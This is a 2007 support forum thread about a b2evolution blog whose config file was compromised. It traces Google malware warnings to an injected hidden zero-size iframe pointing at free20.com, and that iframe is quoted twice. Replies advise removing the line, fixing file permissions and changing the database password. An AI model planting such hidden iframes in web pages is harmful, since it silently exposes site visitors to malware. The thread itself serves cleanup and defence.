Recent Topics
  1. b2evolution CMS Support Forums
  2. b2evolution Support
  3. General Support
  4. malicious url added to site

malicious url added to site

1 Sep 10, 2007 18:23    

My b2evolution Version: Not Entered

Hi all

I have picked up a serious 'bug/malware/badware' problem in my blog.
I recently added a newsreader widget to my sidebar. After about a week of using this widget I removed it because of problems. But now I am getting this error when checking my RSS feeds. I have no idea where I got the 'www.free20' link from, and I am getting alerts from Google that my sight contains malware or badware.
I have used Firebug for Firefox to look for the www.free20' link in my blog, but I can't find it anywhere in my blog files. It's driving me crazy that it's in there somewhere, but I can't find it.
If anybody could help me out and steer me in the right direction, I would greatly appreciate it.

XML Parsing Error: not well-formed
Location: http://vicezilla.com/views/index.php?tempskin=_rdf
Line Number 1, Column 21:<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
--------------------^

Back to top

2 Sep 10, 2007 18:40

Not mutch time now, but I shall give you a clue:
Open ../blogs/skins/_rdf/_main.php and search for the line in the error: <iframe [......] </frame>
and delete it.

You can also replace the contents of the folder ../blogs/skins/_rdf/ by the same folder from a fresh download.

Good luck

Back to top

3 Sep 10, 2007 19:03

and it should be added that if there is a link added to a file that you didnt add, then your file(s) have been compromised.

<iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>

you can google "free20" without the quotes and see a few references to it that describe similar occurrences.

Lastly, this isnt a RSS issue.. that paste is right out of the top of your front page. Im changing the title of this post.

Back to top

4 Sep 11, 2007 05:45

Thanks for all of your help in this issue. After a full day of searching for this piece of iframe code I finally found it at the very bottom of the _basic_config file. I deleted it and all is well again. But now for my next problem...how can I prevent this from happening again? Obviously somebody got access to this file and added the code.
Other than changing passwords for both control panel and FTP access is there anything else that can be done to prevent this from happening again?
Again, any help is greatly appreciated.

Back to top

5 Sep 11, 2007 05:47

For starters, make sure your file permissions are safe and sane

directories: 755
files: 644

thats the very loosest permissions you should have.

Back to top

6 Sep 11, 2007 07:15

Thanks for the input whoo. That was the first thing I checked, and strangely enough the only file that didn't have the permissions you stated was the _basic_config file. It was set at 666.
Whether or not the permission was set at 666 before or after the hack, I'm not sure, but I'll be keeping a close eye on them for a while to see if there is any other suspicious activity in the coming days.

Back to top

7 Sep 11, 2007 07:25

youre missing one important thing. if they were able to edit that file, they were able to read it.

It contains mysql information.

You need to insure that your mysql password is changed.

Back to top

8 Sep 12, 2007 07:47

Yeah I was shocked to find that information so out in the open, so it was changed ASAP before I deleted the code in the file.

Back to top


Form is loading...